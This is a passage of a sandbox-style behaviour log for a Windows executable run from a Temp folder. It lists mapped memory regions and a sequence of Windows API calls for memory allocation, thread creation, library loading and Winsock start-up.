"\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 7029 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 7030 start_va = 0x170000 end_va = 0x1a8fff monitored = 0 entry_point = 0x1712f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7031 start_va = 0xf50000 end_va = 0x10d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 7036 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7045 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 7046 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7047 start_va = 0x10e0000 end_va = 0x1260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 7048 start_va = 0x1270000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 7049 start_va = 0x7ffd4e270000 end_va = 0x7ffd4e2dafff monitored = 0 entry_point = 0x7ffd4e2890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7233 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7315 start_va = 0xc000000000 end_va = 0xc0003fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c000000000" filename = "" Region: id = 7316 start_va = 0x2670000 end_va = 0x2e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 7317 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7322 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 7347 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 7368 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 7525 start_va = 0x2e70000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 7526 start_va = 0x3070000 end_va = 0x326ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 7531 start_va = 0x3270000 end_va = 0x346ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 7536 start_va = 0x3470000 end_va = 0x366ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 7750 start_va = 0xb00000 end_va = 0xb5bfff monitored = 0 entry_point = 0xb16f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7754 start_va = 0xb60000 end_va = 0xb61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 7755 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 7756 start_va = 0x3670000 end_va = 0x3a6afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003670000" filename = "" Region: id = 7785 start_va = 0xb00000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 7899 start_va = 0xb80000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 9040 start_va = 0x3a70000 end_va = 0x3f61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 9297 start_va = 0x3f70000 end_va = 0x4461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f70000" filename = "" Region: id = 9298 start_va = 0x4470000 end_va = 0x4961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004470000" filename = "" Region: id = 10489 start_va = 0xc000400000 end_va = 0xc000bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000c000400000" filename = "" Region: id = 10490 start_va = 0xbc0000 end_va = 0xbe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 10491 start_va = 0xbf0000 end_va = 0xc11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 10607 start_va = 0xb40000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 10608 start_va = 0xd50000 end_va = 0xd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Thread: id = 152 os_tid = 0xbc0 [0232.322] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="WriteFile") returned 0x7ffd4e1edcc0 [0232.322] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="WriteConsoleW") returned 0x7ffd4e1ee050 [0232.323] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="WaitForMultipleObjects") returned 0x7ffd4e1ed820 [0232.323] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="WaitForSingleObject") returned 0x7ffd4e1ed840 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="VirtualQuery") returned 0x7ffd4e1e3c10 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="VirtualFree") returned 0x7ffd4e1e32a0 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="VirtualAlloc") returned 0x7ffd4e1e28c0 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SwitchToThread") returned 0x7ffd4e1de370 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetWaitableTimer") returned 0x7ffd4e1ed800 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetUnhandledExceptionFilter") returned 0x7ffd4e1e6ea0 [0232.324] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetProcessPriorityBoost") returned 0x7ffd4e1ea3a0 [0232.325] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetEvent") returned 0x7ffd4e1ed7f0 [0232.325] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetErrorMode") returned 0x7ffd4e1e3ac0 [0232.325] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetConsoleCtrlHandler") returned 0x7ffd4e1ee020 [0232.326] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="LoadLibraryA") returned 0x7ffd4e1e74d0 [0232.326] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="LoadLibraryW") returned 0x7ffd4e1e50f0 [0232.327] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetSystemInfo") returned 0x7ffd4e1e6720 [0232.327] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetSystemDirectoryA") returned 0x7ffd4e1e3540 [0232.328] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetStdHandle") returned 0x7ffd4e1e3e80 [0232.328] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetQueuedCompletionStatus") returned 0x7ffd4e1dd5c0 [0232.328] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetProcessAffinityMask") returned 0x7ffd4e1e1660 [0232.328] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetProcAddress") returned 0x7ffd4e1e0b80 [0232.328] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetEnvironmentStringsW") returned 0x7ffd4e1e6790 [0232.328] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetConsoleMode") returned 0x7ffd4e1edfa0 [0232.329] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="FreeEnvironmentStringsW") returned 0x7ffd4e1e67a0 [0232.329] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="ExitProcess") returned 0x7ffd4e1e4d80 [0232.329] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="DuplicateHandle") returned 0x7ffd4e1ed660 [0232.329] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="CreateThread") returned 0x7ffd4e1e16f0 [0232.329] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="CreateIoCompletionPort") returned 0x7ffd4e1e4440 [0232.329] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="CreateEventA") returned 0x7ffd4e1ed6a0 [0232.330] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="CloseHandle") returned 0x7ffd4e1ed650 [0232.330] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="AddVectoredExceptionHandler") returned 0x7ffd50542650 [0232.331] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0xafff30 | out: lpflOldProtect=0xafff30*=0x2) returned 1 [0232.331] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0xafff30 | out: lpflOldProtect=0xafff30*=0x4) returned 1 [0241.370] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x7ffd4e1c0000 [0241.371] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="AddDllDirectory") returned 0x7ffd4d6e8030 [0241.371] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="AddVectoredContinueHandler") returned 0x7ffd5055deb0 [0241.372] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetQueuedCompletionStatusEx") returned 0x7ffd4e1c1020 [0241.372] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="LoadLibraryExA") returned 0x7ffd4e1e6b80 [0241.372] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="LoadLibraryExW") returned 0x7ffd4e1e0dd0 [0241.372] LoadLibraryExA (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd4e480000 [0241.913] GetProcAddress (hModule=0x7ffd4e480000, lpProcName="SystemFunction036") returned 0x7ffd4c591a10 [0242.220] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd504d0000 [0242.221] GetProcAddress (hModule=0x7ffd504d0000, lpProcName="NtWaitForSingleObject") returned 0x7ffd50574dc0 [0242.221] LoadLibraryExA (lpLibFileName="winmm.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd4b250000 [0242.852] GetProcAddress (hModule=0x7ffd4b250000, lpProcName="timeBeginPeriod") returned 0x7ffd4b253060 [0242.852] GetProcAddress (hModule=0x7ffd4b250000, lpProcName="timeEndPeriod") returned 0x7ffd4b253330 [0242.852] LoadLibraryExA (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd4e270000 [0242.858] GetProcAddress (hModule=0x7ffd4e270000, lpProcName="WSAGetOverlappedResult") returned 0x7ffd4e284bf0 [0242.858] GetProcAddress (hModule=0x7ffd504d0000, lpProcName="wine_get_version") returned 0x0 [0243.957] SetErrorMode (uMode=0x2) returned 0x1 [0243.957] SetErrorMode (uMode=0x8003) returned 0x2 [0243.957] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4602f0) returned 0xc5c5d0 [0243.958] RtlAddVectoredContinueHandler () returned 0xc5c600 [0243.958] RtlAddVectoredContinueHandler () returned 0xc5c690 [0243.958] SetConsoleCtrlHandler (HandlerRoutine=0x460320, Add=1) returned 1 [0243.959] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0243.960] GetProcessAffinityMask (in: hProcess=0xffffffffffffffff, lpProcessAffinityMask=0xaffeb8, lpSystemAffinityMask=0xaffeb0 | out: lpProcessAffinityMask=0xaffeb8, lpSystemAffinityMask=0xaffeb0) returned 1 [0243.961] GetSystemInfo (in: lpSystemInfo=0xaffec0 | out: lpSystemInfo=0xaffec0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0243.961] SetProcessPriorityBoost (hProcess=0xffffffffffffffff, bDisablePriorityBoost=1) returned 1 [0254.506] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0260.000] VirtualAlloc (lpAddress=0xc000000000, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0xc000000000 [0260.001] VirtualAlloc (lpAddress=0x0, dwSize=0x800000, flAllocationType=0x3000, flProtect=0x4) returned 0x2670000 [0260.004] VirtualAlloc (lpAddress=0x0, dwSize=0x21080, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0260.237] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e0000 [0260.326] VirtualAlloc (lpAddress=0xc000000000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000000000 [0261.031] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0261.421] VirtualAlloc (lpAddress=0xc000002000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000002000 [0261.550] SystemFunction036 (in: RandomBuffer=0x8f74e0, RandomBufferLength=0x80 | out: RandomBuffer=0x8f74e0) returned 1 [0261.551] VirtualAlloc (lpAddress=0xc000004000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000004000 [0261.552] VirtualAlloc (lpAddress=0xc000006000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000006000 [0261.707] GetEnvironmentStringsW () returned 0xc60bd0* [0261.708] VirtualAlloc (lpAddress=0xc000008000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000008000 [0261.853] VirtualAlloc (lpAddress=0xc00000a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000a000 [0261.854] VirtualAlloc (lpAddress=0xc00000c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000c000 [0261.855] VirtualAlloc (lpAddress=0xc00000e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000e000 [0261.855] VirtualAlloc (lpAddress=0xc000010000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000010000 [0261.856] VirtualAlloc (lpAddress=0xc000012000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000012000 [0261.856] VirtualAlloc (lpAddress=0xc000014000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000014000 [0261.857] FreeEnvironmentStringsW (penv=0xc60bd0) returned 1 [0261.857] LoadLibraryExA (lpLibFileName="powrprof.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd4cb10000 [0262.827] GetProcAddress (hModule=0x7ffd4cb10000, lpProcName="PowerRegisterSuspendResumeNotification") returned 0x7ffd4cb11b80 [0262.992] PowerRegisterSuspendResumeNotification (in: Flags=0x2, Recipient=0xaffe20, RegistrationHandle=0xaffe08 | out: RegistrationHandle=0xaffe08) returned 0x0 [0265.178] VirtualAlloc (lpAddress=0xc000016000, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000016000 [0265.965] VirtualAlloc (lpAddress=0xc000024000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000024000 [0266.464] VirtualAlloc (lpAddress=0xc000026000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000026000 [0266.672] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xaffe78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xaffe78*=0xc0) returned 1 [0266.672] VirtualQuery (in: lpAddress=0xaffe98, lpBuffer=0xaffe98, dwLength=0x30 | out: lpBuffer=0xaffe98*(BaseAddress=0xaff000, AllocationBase=0x900000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff9a84)) returned 0x30 [0266.786] VirtualAlloc (lpAddress=0xc00002e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002e000 [0266.786] VirtualAlloc (lpAddress=0xc000030000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000030000 [0266.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4604f0, lpParameter=0xc00002e380, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc4 [0266.954] CloseHandle (hObject=0xc4) returned 1 [0266.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4604f0, lpParameter=0xc00002e700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc4 [0266.976] CloseHandle (hObject=0xc4) returned 1 [0267.649] VirtualAlloc (lpAddress=0xc000032000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000032000 [0267.652] VirtualAlloc (lpAddress=0xc00003a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003a000 [0267.654] VirtualAlloc (lpAddress=0xc00003c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003c000 [0267.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4604f0, lpParameter=0xc00002ea80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcc [0267.657] CloseHandle (hObject=0xcc) returned 1 [0267.658] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0267.658] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd0 [0267.658] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0267.989] VirtualAlloc (lpAddress=0xc000044000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000044000 [0268.188] VirtualAlloc (lpAddress=0xc000046000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000046000 [0268.486] SetEvent (hEvent=0xec) returned 1 [0268.486] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0269.336] VirtualAlloc (lpAddress=0xc000048000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000048000 [0269.416] VirtualAlloc (lpAddress=0xc00004a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004a000 [0269.631] SetEvent (hEvent=0xec) returned 1 [0269.632] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0270.097] VirtualAlloc (lpAddress=0xc00004c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004c000 [0270.098] VirtualAlloc (lpAddress=0xc00004e000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004e000 [0270.109] VirtualAlloc (lpAddress=0xc000052000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000052000 [0270.110] VirtualAlloc (lpAddress=0xc000054000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000054000 [0270.125] VirtualAlloc (lpAddress=0xc000056000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000056000 [0270.614] SetEvent (hEvent=0xec) returned 1 [0270.614] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0271.165] VirtualAlloc (lpAddress=0xc000058000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000058000 [0271.489] SetEvent (hEvent=0xec) returned 1 [0271.489] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0271.798] VirtualAlloc (lpAddress=0xc00005a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005a000 [0272.155] VirtualAlloc (lpAddress=0xc00005c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005c000 [0272.292] SetEvent (hEvent=0xec) returned 1 [0272.293] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0272.540] VirtualAlloc (lpAddress=0xc00005e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005e000 [0273.345] VirtualAlloc (lpAddress=0xc000060000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000060000 [0273.414] SetEvent (hEvent=0xec) returned 1 [0273.415] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0273.857] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd4e1c0000 [0274.026] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetStdHandle") returned 0x7ffd4e1e3e80 [0274.177] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0274.304] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetHandleInformation") returned 0x7ffd4e1ed680 [0274.304] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0274.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0274.314] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0274.314] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0274.314] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0274.543] SetEvent (hEvent=0xec) returned 1 [0274.543] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0275.006] VirtualAlloc (lpAddress=0xc000062000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000062000 [0275.007] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetSystemDirectoryW") returned 0x7ffd4e1e03c0 [0275.007] GetSystemDirectoryW (in: lpBuffer=0xc000062000, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0275.008] VirtualAlloc (lpAddress=0xc000064000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000064000 [0275.042] VirtualAlloc (lpAddress=0xc000066000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000066000 [0275.196] VirtualAlloc (lpAddress=0xc000068000, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000068000 [0275.198] VirtualAlloc (lpAddress=0xc000076000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000076000 [0275.426] SetEvent (hEvent=0xec) returned 1 [0275.426] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0275.896] VirtualAlloc (lpAddress=0xc000078000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000078000 [0275.897] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffd4e270000 [0275.897] GetProcAddress (hModule=0x7ffd4e270000, lpProcName="WSAStartup") returned 0x7ffd4e284160 [0276.011] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xc00002bc30 | out: lpWSAData=0xc00002bc30) returned 0 [0276.112] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="CancelIoEx") returned 0x7ffd4e1e76a0 [0276.112] VirtualAlloc (lpAddress=0xc00007a000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00007a000 [0276.155] VirtualAlloc (lpAddress=0xc000082000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000082000 [0276.156] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetFileCompletionNotificationModes") returned 0x7ffd4e1e4da0 [0276.156] GetProcAddress (hModule=0x7ffd4e270000, lpProcName="WSAEnumProtocolsW") returned 0x7ffd4e2883f0 [0276.157] WSAEnumProtocolsW (in: lpiProtocols=0xc000084d78, lpProtocolBuffer=0xc000084d80, lpdwBufferLength=0xc000084d74 | out: lpProtocolBuffer=0xc000084d80, lpdwBufferLength=0xc000084d74) returned 4 [0276.783] SetEvent (hEvent=0xec) returned 1 [0276.783] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0277.407] VirtualAlloc (lpAddress=0xc00008a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008a000 [0277.409] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetConsoleMode") returned 0x7ffd4e1edfa0 [0277.409] VirtualAlloc (lpAddress=0xc00008c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008c000 [0277.410] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc000089d84 | out: lpMode=0xc000089d84) returned 0 [0277.410] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetFileType") returned 0x7ffd4e1edac0 [0277.410] GetFileType (hFile=0x0) returned 0x0 [0277.410] VirtualAlloc (lpAddress=0xc00008e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008e000 [0277.410] VirtualAlloc (lpAddress=0xc000090000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000090000 [0277.410] VirtualAlloc (lpAddress=0xc000092000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000092000 [0277.548] SetEvent (hEvent=0xec) returned 1 [0277.557] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0xb00000 [0277.568] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc000089d84 | out: lpMode=0xc000089d84) returned 0 [0277.568] GetFileType (hFile=0x0) returned 0x0 [0277.568] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc000089d84 | out: lpMode=0xc000089d84) returned 0 [0277.568] GetFileType (hFile=0x0) returned 0x0 [0277.568] VirtualAlloc (lpAddress=0xc000094000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000094000 [0277.732] SetEvent (hEvent=0xe0) returned 1 [0277.732] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0277.886] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetCommandLineW") returned 0x7ffd4e1e6a00 [0277.886] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\D8BD.exe" [0277.886] VirtualAlloc (lpAddress=0xc000096000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000096000 [0278.597] SetEvent (hEvent=0xd4) returned 1 [0278.597] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0278.902] VirtualAlloc (lpAddress=0xc000098000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000098000 [0278.902] VirtualAlloc (lpAddress=0xc00009a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009a000 [0278.919] VirtualAlloc (lpAddress=0xc00009c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009c000 [0279.002] VirtualAlloc (lpAddress=0xc00009e000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009e000 [0279.557] SetEvent (hEvent=0xd4) returned 1 [0279.557] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0279.899] VirtualAlloc (lpAddress=0xc0000a2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a2000 [0280.351] SetEvent (hEvent=0xd4) returned 1 [0280.351] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0281.088] VirtualAlloc (lpAddress=0xc0000a4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a4000 [0281.239] SetEvent (hEvent=0xd4) returned 1 